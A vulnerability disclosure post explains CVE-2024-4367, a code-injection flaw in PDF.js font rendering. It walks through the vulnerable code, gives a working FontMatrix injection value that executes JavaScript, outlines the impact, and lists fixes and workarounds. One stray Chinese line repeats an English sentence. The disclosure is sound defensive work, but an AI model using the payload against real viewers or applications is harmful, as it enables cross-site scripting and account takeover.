TL;DR
This post details CVE-2024-4367, a vulnerability in PDF.js found by Codean Labs. PDF.js is a JavaScript-based PDF viewer maintained by Mozilla. This bug allows an attacker to execute arbitrary JavaScript code as soon as a malicious PDF file is opened. This affects all Firefox users (<126) because PDF.js is used by Firefox to show PDF files, but also seriously impacts many web- and Electron-based applications that (indirectly) use PDF.js for preview functionality.
If you are a developer of a JavaScript/TypeScript-based application that handles PDF files in any way, we recommend checking that you are not (indirectly) using a vulnerable version of PDF.js. See the end of this post for mitigation details.
Introduction
There are two common use-cases for PDF.js. First, it is Firefox’s built-in PDF viewer. If you use Firefox and you’ve ever downloaded or browsed to a PDF file you’ll have seen it in action. Second, it is bundled into a Node module called pdfjs-dist, with ~2.7 million weekly downloads according to NPM. In this form, websites can use it to provide embedded PDF preview functionality. This is used by everything from Git-hosting platforms to note-taking applications. The one you’re thinking of now is likely using PDF.js.
The PDF format is famously complex. With support for various media types, complicated font rendering and even rudimentary scripting, PDF readers are a common target for vulnerability researchers. With such a large amount of parsing logic, there are bound to be some mistakes, and PDF.js is no exception to this. What makes it unique however is that it is written in JavaScript as opposed to C or C++. This means that there is no opportunity for memory corruption problems, but as we will see it comes with its own set of risks.
Glyph rendering
You might be surprised to hear that this bug is not related to the PDF format’s (JavaScript!) scripting functionality. Instead, it is an oversight in a specific part of the font rendering code.
Fonts in PDFs can come in several different formats, some of them more obscure than others (at least for us). For modern formats like TrueType, PDF.js defers mostly to the browser’s own font renderer. In other cases, it has to manually turn glyph (i.e., character) descriptions into curves on the page. To optimize this for performance, a path generator function is pre-compiled for every glyph. If supported, this is done by making a JavaScript Function object with a body (jsBuf) containing the instructions that make up the path:
if (this.isEvalSupported && FeatureTest.isEvalSupported) {
  const jsBuf = [];
  for (const current of cmds) {
    const args = current.args !== undefined ? current.args.join(",") : "";
    jsBuf.push("c.", current.cmd, "(", args, ");\n");
  }
  console.log(jsBuf.join(""));
  return (this.compiledGlyphs[character] = new Function(
    "c",
    "size",
    jsBuf.join("")
  ));
}
From an attacker perspective this is really interesting: if we can somehow control these cmds going into the Function body and insert our own code, it would be executed as soon as such a glyph is rendered.
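To make the mechanism concrete, here is a minimal standalone sketch of the same string-to-Function step. It is a simplified stand-in, not the PDF.js source: compileCommands and makeRecorder are hypothetical names, and the recorder is a stub that takes the place of a real canvas context.

```javascript
// Simplified stand-in for the glyph compilation step (not the PDF.js source).
function compileCommands(cmds) {
  const jsBuf = [];
  for (const current of cmds) {
    const args = current.args !== undefined ? current.args.join(",") : "";
    jsBuf.push("c.", current.cmd, "(", args, ");\n");
  }
  // The joined strings become the source code of a new function.
  return new Function("c", "size", jsBuf.join(""));
}

// Hypothetical stub context: every method call is recorded instead of drawn.
function makeRecorder() {
  const calls = [];
  const handler = {
    get: (_target, name) => (...args) => {
      calls.push([name, ...args]);
    },
  };
  return { ctx: new Proxy({}, handler), calls };
}

const { ctx, calls } = makeRecorder();
const glyph = compileCommands([
  { cmd: "save" },
  { cmd: "transform", args: [0.001, 0, 0, 0.001, 0, 0] },
  { cmd: "scale", args: ["size", "-size"] },
  { cmd: "moveTo", args: [0, 0] },
  { cmd: "restore" },
]);
glyph(ctx, 12);
console.log(calls);
```

Note that the "size" and "-size" arguments are strings that end up unquoted in the function body, where they resolve to the size parameter. The same lack of quoting applies to every other argument.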
Well, let’s look at how this list of commands is generated. Following the logic back to the CompiledFont class we find the method compileGlyph(...). This method initializes the cmds array with a few general commands (save, transform, scale and restore), and defers to a compileGlyphImpl(...) method to fill in the actual rendering commands:
compileGlyph(code, glyphId) {
  if (!code || code.length === 0 || code[0] === 14) {
    return NOOP;
  }
  let fontMatrix = this.fontMatrix;
  ...
  const cmds = [
    { cmd: "save" },
    { cmd: "transform", args: fontMatrix.slice() },
    { cmd: "scale", args: ["size", "-size"] },
  ];
  this.compileGlyphImpl(code, cmds, glyphId);
  cmds.push({ cmd: "restore" });
  return cmds;
}
If we instrument the PDF.js code to log generated Function objects, we see that the generated code indeed contains those commands:
c.save();
c.transform(0.001,0,0,0.001,0,0);
c.scale(size,-size);
c.moveTo(0,0);
c.restore();
At this point we could audit the font parsing code and the various commands and arguments that can be produced by glyphs, like quadraticCurveTo and bezierCurveTo, but all of this seems pretty innocent with no ability to control anything other than numbers. What turns out to be much more interesting however is the transform command we saw above:
{ cmd: "transform", args: fontMatrix.slice() },
This fontMatrix array is copied (with .slice()) and inserted into the body of the Function object, joined by commas. The code clearly assumes that it is a numeric array, but is that always the case? Any string inside this array would be inserted literally, without any quotes surrounding it. Hence, that would break the JavaScript syntax at best, and give arbitrary code execution at worst. But can we even control the contents of fontMatrix to that degree?
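The "break the syntax at best" case is easy to reproduce in isolation. The sketch below assumes a hypothetical helper, buildTransformCall, that mimics how the matrix is joined into the function body. It shows that Array.prototype.join does not quote string elements, and that a stray string makes the Function constructor throw.

```javascript
// Hypothetical helper mimicking how the matrix ends up in the function body.
function buildTransformCall(matrix) {
  return "c.transform(" + matrix.join(",") + ");\n";
}

// A purely numeric matrix yields valid source code.
const numeric = buildTransformCall([0.001, 0, 0, 0.001, 0, 0]);

// A string element is inserted verbatim, without quotes.
const withString = buildTransformCall([1, 2, 3, 4, 5, "foo bar"]);

// Compiling the second body fails, because "foo bar" is not valid syntax here.
let syntaxBroken = false;
try {
  new Function("c", "size", withString);
} catch (e) {
  syntaxBroken = e.name === "SyntaxError";
}

console.log(JSON.stringify(numeric));
console.log(JSON.stringify(withString));
console.log(syntaxBroken);
```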
Enter the FontMatrix
The value of fontMatrix defaults to [0.001, 0, 0, 0.001, 0, 0], but is often set to a custom matrix by a font itself, i.e., in its own embedded metadata. How this is done exactly differs per font format. Here’s the Type1 parser for example:
extractFontHeader(properties) {
  let token;
  while ((token = this.getToken()) !== null) {
    if (token !== "/") {
      continue;
    }
    token = this.getToken();
    switch (token) {
      case "FontMatrix":
        const matrix = this.readNumberArray();
        properties.fontMatrix = matrix;
        break;
      ...
    }
    ...
  }
  ...
}
This is not very interesting for us. Even though Type1 fonts technically contain arbitrary PostScript code in their header, no sane PDF reader supports this fully and most just try to read predefined key-value pairs with expected types. In this case, PDF.js just reads a number array when it encounters a FontMatrix key. It appears that the CFF parser (used for several other font formats) is similar in this regard. All in all, it looks like we are indeed limited to numbers.
However, it turns out that there is more than one potential origin of this matrix. Apparently, it is also possible to specify a custom FontMatrix value outside of a font, namely in a metadata object in the PDF! Looking carefully at the PartialEvaluator.translateFont(...) method, we see that it loads various attributes from PDF dictionaries associated with the font, one of them being the fontMatrix:
const properties = {
  type,
  name: fontName.name,
  subtype,
  file: fontFile,
  ...
  fontMatrix: dict.getArray("FontMatrix") || FONT_IDENTITY_MATRIX,
  ...
  bbox: descriptor.getArray("FontBBox") || dict.getArray("FontBBox"),
  ascent: descriptor.get("Ascent"),
  descent: descriptor.get("Descent"),
  xHeight: descriptor.get("XHeight") || 0,
  capHeight: descriptor.get("CapHeight") || 0,
  flags: descriptor.get("Flags"),
  italicAngle: descriptor.get("ItalicAngle") || 0,
  ...
};
In the PDF format, a font definition consists of several objects: the Font, its FontDescriptor and the actual FontFile. For example, here represented by objects 1, 2 and 3:
1 0 obj
<<
/Type /Font
/Subtype /Type1
/FontDescriptor 2 0 R
/BaseFont /FooBarFont
>>
endobj
2 0 obj
<<
/Type /FontDescriptor
/FontName /FooBarFont
/FontFile 3 0 R
/ItalicAngle 0
/Flags 4
>>
endobj
3 0 obj
<<
/Length 100
>>
... (actual binary font data) ...
endobj
The dict referenced by the code above refers to the Font object. Hence, we should be able to define a custom FontMatrix array like this:
1 0 obj
<<
/Type /Font
/Subtype /Type1
/FontDescriptor 2 0 R
/BaseFont /FooBarFont
/FontMatrix [1 2 3 4 5 6]
>>
endobj
When attempting to do this it initially looks like this doesn’t work, as the transform operations in generated Function bodies still use the default matrix. However, this happens because the font file itself is overwriting the value. Luckily, when using a Type1 font without an internal FontMatrix definition, the PDF-specified value is authoritative as the fontMatrix value is not overwritten.
Now that we can control this array from a PDF object we have all the flexibility we want, as PDF supports more than just number-type primitives. Let’s try inserting a string-type value instead of a number (in PDF, strings are delimited by parentheses):
/FontMatrix [1 2 3 4 5 (foobar)]
And indeed, it is plainly inserted into the Function body!
c.save();
c.transform(1,2,3,4,5,foobar);
c.scale(size,-size);
c.moveTo(0,0);
c.restore();
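The root cause is that a value read from the PDF dictionary is trusted to be a numeric array. As an illustration only (this is not the actual PDF.js patch, and sanitizeFontMatrix is a hypothetical name), a defensive check could reject anything that is not six finite numbers and fall back to the default matrix:

```javascript
// Default matrix value quoted in the article.
const FONT_IDENTITY_MATRIX = [0.001, 0, 0, 0.001, 0, 0];

// Hypothetical validation helper: accept only arrays of six finite numbers.
function sanitizeFontMatrix(value) {
  const ok =
    Array.isArray(value) &&
    value.length === 6 &&
    value.every((v) => typeof v === "number" && Number.isFinite(v));
  return ok ? value.slice() : FONT_IDENTITY_MATRIX.slice();
}

console.log(sanitizeFontMatrix([1, 2, 3, 4, 5, 6]));
console.log(sanitizeFontMatrix([1, 2, 3, 4, 5, "foobar"]));
```

With such a check in place, the string element above would never reach the generated function body.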
Exploitation and impact
Inserting arbitrary JavaScript code is now only a matter of juggling the syntax properly. Here’s a classic example triggering an alert, by first closing the c.transform(...) call, and making use of the trailing parenthesis:
/FontMatrix [1 2 3 4 5 (0\); alert\('foobar')]
The result is exactly as expected:
结果与预期完全一致:
[Figure: Exploitation of CVE-2024-4367]
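The syntax juggling can be reproduced safely outside a browser. In this sketch the payload calls a harmless method on a stub object instead of alert; the injected method name and the stub context are assumptions made for illustration, and the body is built the same way as in the generated code shown earlier.

```javascript
// Payload shaped like the one in the article: close the transform call,
// start a new call, and let the trailing ");" from the generator finish it.
const payload = "0); c.injected('foobar'";
const body = "c.transform(" + [1, 2, 3, 4, 5, payload].join(",") + ");\n";

// Stub context that records what the generated function does.
const calls = [];
const ctx = {
  transform: (...args) => calls.push(["transform", ...args]),
  injected: (message) => calls.push(["injected", message]),
};

new Function("c", "size", body)(ctx, 1);

console.log(body);
console.log(calls);
```

The generated body contains two statements: the original transform call, now with 0 as its last argument, and the attacker-supplied call.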
You can find a proof-of-concept PDF file here. It is made to be easy to adapt using a regular text editor. To demonstrate the context in which the JavaScript is running, the alert will show you the value of window.origin. Interestingly enough, this is not the file:// path you see in the URL bar (if you’ve downloaded the file). Instead, PDF.js runs under the origin resource://pdf.js. This prevents access to local files, but it is slightly more privileged in other aspects. For example, it is possible to invoke a file download (through a dialog), even to “download” arbitrary file:// URLs. Additionally, the real path of the opened PDF file is stored in window.PDFViewerApplication.url, allowing an attacker to spy on people opening a PDF file, learning not just when they open the file and what they’re doing with it, but also where the file is located on their machine.
In applications that embed PDF.js, the impact is potentially even worse. If no mitigations are in place (see below), this essentially gives an attacker an XSS primitive on the domain which includes the PDF viewer. Depending on the application this can lead to data leaks, malicious actions being performed in the name of a victim, or even a full account take-over. On Electron apps that do not properly sandbox JavaScript code, this vulnerability even leads to native code execution (!). We found this to be the case for at least one popular Electron app.
Mitigation
At Codean Labs we realize it is difficult to keep track of dependencies like this and their associated risks. It is our pleasure to take this burden from you. We perform application security assessments in an efficient, thorough and human manner, allowing you to focus on development. Click here to learn more.
The best mitigation against this vulnerability is to update PDF.js to version 4.2.67 or higher. Most wrapper libraries like react-pdf have also released patched versions. Because some higher level PDF-related libraries statically embed PDF.js, we recommend recursively checking your node_modules folder for files called pdf.js to be sure. Headless use-cases of PDF.js (e.g., on the server-side to obtain statistics and data from PDFs) seem not to be affected, but we didn’t thoroughly test this, so updating is still advised there.
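The recursive check can be scripted. The following Node.js sketch is one possible approach, not an official tool: the function names are hypothetical, the file-name pattern (which also matches pdf.min.js and .mjs variants) is an assumption, and the version comparison simply treats anything below 4.2.67 as vulnerable.

```javascript
const fs = require("fs");
const path = require("path");

// First fixed release according to the article.
const FIXED = [4, 2, 67];

// Returns true when a "major.minor.patch" version is older than the fix.
function isVulnerable(version) {
  const parts = version.split(".").map((p) => parseInt(p, 10));
  for (let i = 0; i < 3; i++) {
    const a = parts[i] || 0;
    if (a !== FIXED[i]) return a < FIXED[i];
  }
  return false;
}

// Recursively collects files that look like a bundled copy of PDF.js.
function findPdfJs(dir, hits = []) {
  let entries;
  try {
    entries = fs.readdirSync(dir, { withFileTypes: true });
  } catch {
    return hits; // unreadable or missing directory
  }
  for (const entry of entries) {
    const full = path.join(dir, entry.name);
    if (entry.isDirectory()) {
      findPdfJs(full, hits);
    } else if (/^pdf(\.min)?\.m?js$/.test(entry.name)) {
      hits.push(full);
    }
  }
  return hits;
}

for (const file of findPdfJs("node_modules")) {
  console.log("possible PDF.js copy:", file);
}
```

Each hit still needs a manual look, since a statically embedded copy does not necessarily carry a package.json with a version. Where one exists next to the file, its version field can be passed to isVulnerable.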
Additionally, a simple workaround is to set the PDF.js setting isEvalSupported to false. This will disable the vulnerable code-path. If you have a strict content-security policy (disabling the use of eval and the Function constructor), the vulnerability is also not reachable.
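As a rough sketch of both workarounds: isEvalSupported is passed along with the other document loading parameters, and a content-security policy whose script-src does not include 'unsafe-eval' blocks eval and the Function constructor. The helper name, the example URL and the exact policy string below are assumptions for illustration.

```javascript
// Hypothetical helper that builds loading parameters with eval disabled.
function hardenedLoadOptions(url) {
  return { url, isEvalSupported: false };
}

const options = hardenedLoadOptions("/files/report.pdf");

// With pdfjs-dist loaded as pdfjsLib, the options would be used like this:
//   const pdf = await pdfjsLib.getDocument(options).promise;

// Example policy value: no 'unsafe-eval' in script-src, so eval() and
// new Function() are rejected by the browser.
const cspHeader = "script-src 'self'";

console.log(options, cspHeader);
```

Treat the workaround as a stopgap alongside updating, since the setting has to be applied at every place where documents are loaded.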
Timeline
- 2024-04-26 – vulnerability disclosed to Mozilla
- 2024-04-29 – PDF.js v4.2.67 released to NPM, fixing the issue
- 2024-05-14 – Firefox 126, Firefox ESR 115.11 and Thunderbird 115.11 released including the fixed version of PDF.js
- 2024-05-20 – publication of this blogpost